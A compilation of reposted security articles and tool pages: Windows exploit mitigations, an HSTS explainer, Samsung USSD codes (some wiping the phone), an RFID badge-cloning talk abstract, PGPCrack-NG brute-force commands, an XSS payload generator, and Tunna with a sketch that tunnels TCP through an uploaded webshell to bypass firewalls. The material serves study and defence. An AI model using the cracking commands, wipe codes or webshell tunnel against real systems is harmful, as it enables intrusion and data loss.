Modern versions of Microsoft Windows (i.e., Windows 7, 8, and 8.1 at the time of writing) have built-in mechanisms which can help to protect the user from destructive actions delivered by exploits. These features became available starting with Windows Vista and were upgraded in the most recent operating system versions. They include:

DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization): these mechanisms introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system, through special restrictions on the use of memory that should not be used to execute code, and the placement of program modules into memory at random addresses.

UAC (User Account Control): upgraded from Windows 7 onward, UAC requires confirmation from the user before running programs that need to change system settings or create files in system directories.

SmartScreen Filter: helps to prevent the downloading of malicious software from the Internet based on the file's reputation; files known to be malicious or not recognized by the filter are blocked.
Originally SmartScreen was a part of Internet Explorer, but with the release of Windows 8 it was built into the operating system, so it now works with all browsers.

A special "Enhanced Protected Mode" for Internet Explorer (starting from IE10): on Windows 8 this mode allows the browser's tabs to be run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). For Windows 7 x64 (64-bit), this feature allows IE to run tabs as separate 64-bit processes, which helps to mitigate the common heap-spray method of shellcode delivery. For more information, refer to the MSDN blog (here and here).

PDF files

In view of the high risks posed by the use of PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special "Protected Mode" (also referred to as sandboxing) for viewing documents. When using this mode, code from the PDF file is prevented from executing certain potentially dangerous functions.

Figure 2: "Sandbox" mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced).

By default, Protected Mode is turned off: despite the active option "Enable Protected Mode at startup", sandbox mode stays off because the Protected View setting is set to "Disabled". Accordingly, after installation it is strongly recommended that you turn on this setting, applying it to "Files From Potentially Unsafe Locations" or, even better, "All files". Please note that when you turn on Protected View, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open a file, you may receive a tooltip alert advising you that protected mode is active.

Figure 3: Tooltip which indicates active protected mode.

If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button.

Adobe Flash Player

Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch Flash Player in the context of a specially restricted (i.e. sandboxed) process, limiting the ability of this process to access many system resources and places in the file system, and also limiting how it communicates with the network.

Timely updating of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of Adobe Flash Player you can use the official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content.

Internet Browsers

At the beginning of this article we mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor). If a vulnerability has been patched by the developer and an update for it is available, the user can install it without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability, in other words one that has not yet been patched (zero-day), the situation is more complicated for the user.

Modern browsers and operating systems incorporate special technologies for isolating application processes, creating special restrictions on performing various actions which the browser should not be able to perform. In general, this technique is called sandboxing, and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, thus allowing restricted permissions for executing certain actions in a specific tab as well as maintaining the stability of the browser. If one of the tabs hangs, the user can terminate it without terminating the other tabs.

In modern versions of Microsoft's Internet Explorer browser (IE10 and IE11) there is a special sandboxing technology called "Enhanced Protected Mode" (EPM). This mode allows you to restrict the activity of a tab process or plug-in and thus make exploitation much more difficult for attackers.

Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088.

EPM has been upgraded for Windows 8. If you are using EPM on Windows 7 x64, this feature will cause browser tabs to run as 64-bit processes (on a 64-bit OS, Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off.

Figure 5: Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the browser tab processes run as 64-bit, making them difficult to use for malicious code installation (or at least harder to target with heap-spraying attacks).

Starting with Windows 8, Enhanced Protected Mode has been expanded in order to isolate (sandbox) a process's actions at the operating system level. This technology is called "AppContainer" and allows the maximum possible benefit from the use of the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, on Windows 8, EPM mode is enabled by default (IE11).

Figure 6: EPM implementation in Windows 8. On Windows 7 x64, EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer.

Note that before November Patch Tuesday 2013, which included the MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013), Microsoft shipped EPM as the default setting for IE11 on Windows 8+. This update, however, disables EPM for IE11 as the default setting. So now, if you reset advanced IE settings (the "Restore advanced settings" option) to their initial state, EPM will be turned off by default.

Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing mode in Chrome is always active and requires no additional action by the user to launch it. This means that tab processes work with restricted privileges, which does not allow them to perform various system actions.

Figure 7: Sandboxing mode as implemented in Google Chrome.
Notice that almost all of the user's SID groups in the access token have the "Deny" status, restricting access to the system. Additional information can be found on MSDN.

In addition to this mode, Google Chrome is able to block malicious URLs or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer's SmartScreen.

Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage.

When you use Java on Windows, its security settings can be changed using the Control Panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run.

Figure 9: Options for updating Java.

To completely disable Java in all browsers used on the system, remove the option "Enable Java content in the browser" in the Java settings.

Figure 10: Java setting to disable its use in all browsers.

EMET

Microsoft has released a free tool to help protect the operating system from the malicious actions used in exploits.

Figure 11: EMET interface.

The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks. Although Windows 7 and Windows 8 have built-in DEP and ASLR options, which are enabled by default and intended to mitigate the effects of exploitation, EMET introduces new features for blocking the actions of exploits and can enable DEP or ASLR for specified processes (increasing system protection on older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. There is also a list of applications for which EMET is enabled by default, for example the Internet Explorer browser, Java and Microsoft Office. It's a good idea to add your favorite browser and Skype to the list.

Operating System Updates

Keeping your operating system and installed software promptly updated and patched is good practice, because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 are able to automatically deliver updates to the user by default. You can also check for updates through the Windows Control Panel, as shown below.

Figure 12: Windows Update

Generic Exploit Blocking

So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general, and you may be able to turn to your security software for this. For example, ESET introduced something called the Exploit Blocker in the seventh generation of its security products, the anti-malware programs ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used.

Figure 13: ESET Exploit Blocker option turned on in HIPS settings.

Conclusion

Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult. However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits.

This article was contributed by Artem Baranov, Lead Virus Analyst for ESET's Russian distributor.

Author: Guest Writer, We Live Security

Source: Exploit Protection for Microsoft Windows
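Since a binary's DEP and ASLR opt-in is recorded in its PE header, you can audit a file directly. A minimal sketch using the pefile Python library; the flag masks are the standard IMAGE_DLLCHARACTERISTICS bits:

    # Report whether a PE file opts into ASLR and DEP via DllCharacteristics.
    import sys
    import pefile

    DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -> ASLR
    NX_COMPAT    = 0x0100   # IMAGE_DLLCHARACTERISTICS_NX_COMPAT    -> DEP

    pe = pefile.PE(sys.argv[1])
    flags = pe.OPTIONAL_HEADER.DllCharacteristics
    print("ASLR (dynamic base):", bool(flags & DYNAMIC_BASE))
    print("DEP  (NX compatible):", bool(flags & NX_COMPAT))

Run it as, for example: python pecheck.py C:\Windows\System32\notepad.exe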
-
HSTS – The missing link in Transport Layer Security
Posted on November 30, 2013 by Scott Helme

HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably, HSTS mitigates variants of man-in-the-middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk.

Introduction

In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker, who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS and either typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim's browser pointing to the https:// URL. Because all of this is done using HTTP, the communications are vulnerable to being intercepted and modified by SSLstrip. Crucially, the user receives no warnings during the attack and can't verify whether they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS in the browser, which prevents the user navigating to the site using http://.

Implementing HSTS

In order to implement HSTS, a host must declare to a UA that it is an HSTS Host by issuing an HSTS Policy. This is done with the addition of the HTTP response header 'Strict-Transport-Security: max-age=31536000'. The max-age directive is required and can be any value from 0 upwards: the number of seconds after receiving the policy during which the UA is to treat the issuing host as an HSTS Host. It's worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as an HSTS Host and to remove all policy; it does not imply an infinite max-age value. There is also an optional includeSubDomains directive that can be included at the discretion of the host, such as 'Strict-Transport-Security: max-age=31536000; includeSubDomains'. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts too. (A minimal server-side example follows at the end of this post.)

[Screenshot: Twitter's HSTS Policy]

The HSTS response header should only be sent over a secure transport layer, and UAs should ignore this header if received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into an HTTP response, causing undesired behaviour. This does, however, present a very slim window of opportunity for an attacker in a targeted attack. Upon a user's very first interaction with Twitter, the browser will have no knowledge of an HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to an HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack has, however, been tremendously reduced overall. The only opportunity the attacker now has is to be set up and prepared to intercept the very first communication ever with the host, or to wait until the HSTS policy expires after the victim has had no further communication with the host for the duration of the max-age directive.

[Screenshots: HSTS header sent via HTTPS; no HSTS header sent via HTTP]

Once the user has initiated communications with a host that declares a valid HSTS Policy, the UA will consider the host to be an HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections:

1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them.
2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings. (source)

Point 1 means that once Twitter has been accepted by the UA as an HSTS Host, the UA will replace any reference to http:// with https:// where the host is twitter.com (and its subdomains if specified) before it sends the request. This includes links found on any webpage that use http://, shortcuts or bookmarks that may specify http://, and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice, the UA will enforce https://.

Point 2 is also fairly important, if not as important as point 1. By terminating the connection as soon as a warning or error message is triggered, the UA prevents the user from clicking through them. This commonly happens when the user does not understand what the message is saying or because they are not concerned about the security of the connection. Many attacks depend on the poor manner in which users are informed of potential risk and the poor response from users to these warnings. Simply terminating the connection when there is cause for any uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message!

So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from [diagram: initial request uses HTTP with no HSTS policy enforced] to [diagram: all requests use HTTPS when HSTS is enforced].

This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome menu in the top right, then select Tools -> Developer Tools and open the Network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see that the initial request that would have gone to http://twitter.com is not sent, and the browser immediately replaces it with a request to https://twitter.com instead.

[Screenshots: request using HTTP is not sent; HTTP request replaced with HTTPS equivalent]

HSTS In Practice

While not yet widely deployed, HSTS has started to make a more widespread appearance since the specification was published in November 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn't appear to have a very long max-age value.

[Screenshots: Twitter and Facebook HSTS response headers]

Out of interest, I decided to check the websites of a selection of high street banks to see if any had yet implemented an HSTS Policy. Having checked Barclays, Halifax, HSBC, Nationwide, NatWest, RBS, Santander and Yorkshire Bank, I was disappointed to find that none had yet implemented an HSTS Policy, and some of them even have a dedicated online banking domain name.

Preloaded HSTS

It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built-in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts, and you can view the Chromium source to see all the hosts already included. For sites preloaded in the browser, there is no state in which communications will travel over an insecure transport layer. Be it the initial communication, the first communication after wiping the local cache, or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS for the applicable hosts at all times. Unfortunately, this solution isn't really scalable, considering the sheer number of sites that could potentially be included. That said, if all financial institutions, government sites, social networks and other potentially large targets applied to be included, they could mitigate a substantial amount of risk.

Conclusion

HSTS has been a highly anticipated and much needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS, the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer.

Scott.

Short URL: http://scotthel.me/hsts

Source: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
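The server-side example promised above: a minimal sketch of emitting the policy header, assuming a Flask application served over TLS. The framework choice is illustrative (any stack just needs to add one response header), and the max-age mirrors the one-year value discussed in the article.

    # Minimal sketch: emitting an HSTS policy from a Flask app over TLS.
    from flask import Flask

    app = Flask(__name__)

    @app.after_request
    def set_hsts(response):
        # One year, covering subdomains. Only meaningful on HTTPS
        # responses, since UAs must ignore the header over plain HTTP.
        response.headers["Strict-Transport-Security"] = (
            "max-age=31536000; includeSubDomains"
        )
        return response

    @app.route("/")
    def index():
        return "hello"

    if __name__ == "__main__":
        # Ad-hoc self-signed certificate for local testing only.
        app.run(ssl_context="adhoc")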
-
[REF] List of USSD codes!
by kevhuff

Thought I would compile a list of USSD codes for everyone's reference. I have tested most; if anybody has any to add, please feel free. ****Warning: some of these codes can be harmful (wipe data etc.). I am not responsible for anything you do to your device.****

Some of these codes may lead you to a menu; use the option key (far left soft key) to navigate. Some of the functions may be locked to our use, but I'm still working on how to use these menus more extensively.

Information
*#44336# Software Version Info
*#1234# View SW Version PDA, CSC, MODEM
*#12580*369# SW & HW Info
*#197328640# Service Mode
*#06# = IMEI Number.
*#1234# = Firmware Version.
*#2222# = H/W Version.
*#8999*8376263# = All Versions Together.
*#272*imei#* Product code
*#*#3264#*#* - RAM version
*#92782# = Phone Model
*#*#9999#*#* = Phone/pda/csc info

Testing
*#07# Test History
*#232339# WLAN Test Mode
*#232331# Bluetooth Test Mode
*#*#232331#*#* - Bluetooth test
*#0842# Vibration Motor Test Mode
*#0782# Real Time Clock Test
*#0228# ADC Reading
*#32489# (Ciphering Info)
*#232337# Bluetooth Address
*#0673# Audio Test Mode
*#0*# General Test Mode
*#3214789650# LBS Test Mode
*#0289# Melody Test Mode
*#0589# Light Sensor Test Mode
*#0588# Proximity Sensor Test Mode
*#7353# Quick Test Menu
*#8999*8378# = Test Menu.
*#*#0588#*#* - Proximity sensor test
*#*#2664#*#* - Touch screen test
*#*#0842#*#* - Vibration test

Network
*7465625*638*# Configure Network Lock MCC/MNC
#7465625*638*# Insert Network Lock Keycode
*7465625*782*# Configure Network Lock NSP
#7465625*782*# Insert Partial Network Lock Keycode
*7465625*77*# Insert Network Lock Keycode SP
#7465625*77*# Insert Operator Lock Keycode
*7465625*27*# Insert Network Lock Keycode NSP/CP
#7465625*27*# Insert Content Provider Keycode
*#7465625# View Phone Lock Status
*#232338# WLAN MAC Address
*#526# WLAN Engineering Mode - runs WLAN tests (same as below)
*#528# WLAN Engineering Mode
*#2263# RF Band Selection - not sure about this one, appears to be locked
*#301279# HSDPA/HSUPA Control Menu - change HSDPA classes (opt. 1-5)

Tools/Misc.
*#*#1111#*#* - Service Mode
#273283*255*663282*# Data Create SD Card
*#4777*8665# = GPRS Tool.
*#4238378# GCF Configuration
*#1575# GPS Control Menu
*#9090# Diagnostic Configuration
*#7284# USB I2C Mode Control - mount to USB for storage/modem
*#872564# USB Logging Control
*#9900# System dump mode - can dump logs for debugging
*#34971539# Camera Firmware Update
*#7412365# Camera Firmware Menu
*#273283*255*3282*# Data Create Menu - change SMS, MMS, voice, contact limits
*2767*4387264636# Sellout SMS / PCODE view
*#3282*727336*# Data Usage Status
*#*#8255#*#* - Show GTalk service monitor - great source of info
*#3214789# GCF Mode Status
*#0283# Audio Loopback Control
#7594# Remap Shutdown to End Call TSK
*#272886# Auto Answer Selection

***SYSTEM*** (USE CAUTION)
*#7780# Factory Reset
*2767*3855# Full Factory Reset
*#*#7780#*#* Factory data reset
*#745# RIL Dump Menu
*#746# Debug Dump Menu
*#9900# System Dump Mode
*#8736364# OTA Update Menu
*#2663# TSP / TSK firmware update
*#03# NAND Flash S/N

BAM!!!!

Source: [REF] List of USSD codes! [updated 10-30] - xda-developers
-
Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard

Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers, turning them into custom, long-range RFID hacking tools.

This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few-centimeter range of common RFID hacking tools.

Some of the topics we will explore are:

Overview of the best RFID hacking tools available for your toolkit
Stealing RFID proximity badge info from unsuspecting passers-by
Replaying RFID badge info and creating fake cloned cards
Brute-forcing higher privileged badge numbers to gain data center access
Attacking badge readers and controllers directly
Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access
Creating custom RFID hacking tools using the Arduino
Defending yourself from RFID hacking threats

This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field.

Francis Brown (@security_snacks), CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International, where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon, and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation and C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

https://www.facebook.com/BishopFoxConsulting
https://twitter.com/security_snacks

For more information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Source: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
-
PGPCrack-NG

PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacement for the long-dead PGPCrack.

On Fedora 19, do: sudo yum install libassuan-devel -y
On Ubuntu, do: sudo apt-get install libpth-dev libbz2-dev libassuan-dev

Compile using make. You might need to edit the -I/usr/include/libassuan2 part of the Makefile.

Run either of:

cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file>
john -i -stdout | ./PGPCrack-NG <PGP file>

Speed: > 1330 passwords / second on an AMD X3 720 CPU @ 2.8GHz (using a single core).

Source and download: https://github.com/kholia/PGPCrack-NG
-
xssless – Automatic XSS Payload Generator

After working with more and more complex JavaScript payloads for XSS, I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created "xssless", an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don't want to read this post, click here for the github link.

The XSS Vulnerability

Once you have found your initial XSS vulnerability, you're basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not!

XSS Worms & JavaScript Payloads

Remember, if you can execute JavaScript in the user's browser, you can do anything the user's browser can do. This means that as long as you're obeying the same-origin policy, you're good to go! How? JavaScript payloads, of course! Not only are JavaScript payloads real, they are quite dangerous. XSS is often written up as a "low priority" issue in security reports; this is simply not true. I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Lest we forget how powerful the Samy worm was, propagating to over a million accounts and running MySpace's servers into the ground. It was one of the first big displays of just how powerful XSS could be.

Building Complex Payloads

Building payloads can be a real pain: custom coding every POST/GET request and parsing CSRF tokens, all while debugging to ensure it works. After building a rather complex payload, I realized this is pointless. Why couldn't a script do the same?

xssless

Work smart, not hard: using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you perform your web actions in the browser through Burp and then export them into xssless.

An Example Scenario

Imagine we had an XSS in reddit.com. Of course we want to use this cool new exploit (because we lack morality, and this is an example, so bite me). We fire up Burp and set Firefox to use it as a proxy; now we just perform the web action we want to make a payload for.

...

Click here for the Github page

Source: xssless - Automatic XSS Payload Generator | The Hacker Blog
-
Overview

Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP).

Description

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP, it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end. (A conceptual sketch of this idea follows below.)

Tunna framework

The Tunna framework comes with the following functionality:

Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
Metasploit integration module, which allows transparent execution of Metasploit payloads on the server.
ASP.NET remote script.
Java remote script.
PHP remote script.

Author

Tunna has been developed by Nikos Vassakis.

Download: http://www.secforce.com/research/tunna_download.html

Source: SECFORCE :: Penetration Testing :: Research
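The conceptual sketch promised above: a local listener accepts a TCP client and relays its bytes to a remote web script over HTTP POSTs. This is NOT Tunna's actual wire protocol; the webshell URL and the simple poll-with-POST framing are illustrative assumptions only.

    # Conceptual sketch of TCP-over-HTTP tunneling, not Tunna's protocol.
    import socket
    import requests

    WEBSHELL = "http://target.example/uploads/tunnel.aspx"  # hypothetical
    LOCAL_PORT = 4444

    def serve():
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", LOCAL_PORT))
        srv.listen(1)
        client, _ = srv.accept()       # e.g. an SSH/RDP client connects here
        client.settimeout(0.2)
        while True:
            try:
                outbound = client.recv(4096)   # bytes from the local client
                if not outbound:
                    break                      # local client closed
            except socket.timeout:
                outbound = b""                 # nothing to send; poll anyway
            # Wrap the bytes in an HTTP POST; the web script would unwrap
            # them, forward them to the internal service, and return the
            # service's reply in the HTTP response body.
            resp = requests.post(WEBSHELL, data=outbound)
            if resp.content:
                client.sendall(resp.content)

    if __name__ == "__main__":
        serve()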
-
The Pirate Bay's Guyana Domain Goes Down
December 19th, 2013, 08:31 GMT · By Gabriela Vatu

[Caption: The Pirate Bay's new domain is no longer working]

The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it's uncertain whether the domain was seized and the site has moved on to another location, or whether there's an issue with the servers.

The site's insiders said that the easiest way to access the Pirate Bay would be via its old domains at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn't seem to be working either for now. The site's admins said yesterday that they already had a bunch of domains set up in case they needed to move again, mentioning that there were about 70 more domains to choose from.

Last week, the Pirate Bay lost its .SX domain. From there, it moved to Ascension Island's .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles on a new domain, the blog will be updated, so check back soon.

[UPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain.

Source: The Pirate Bay's Guyana Domain Goes Down [UPDATE]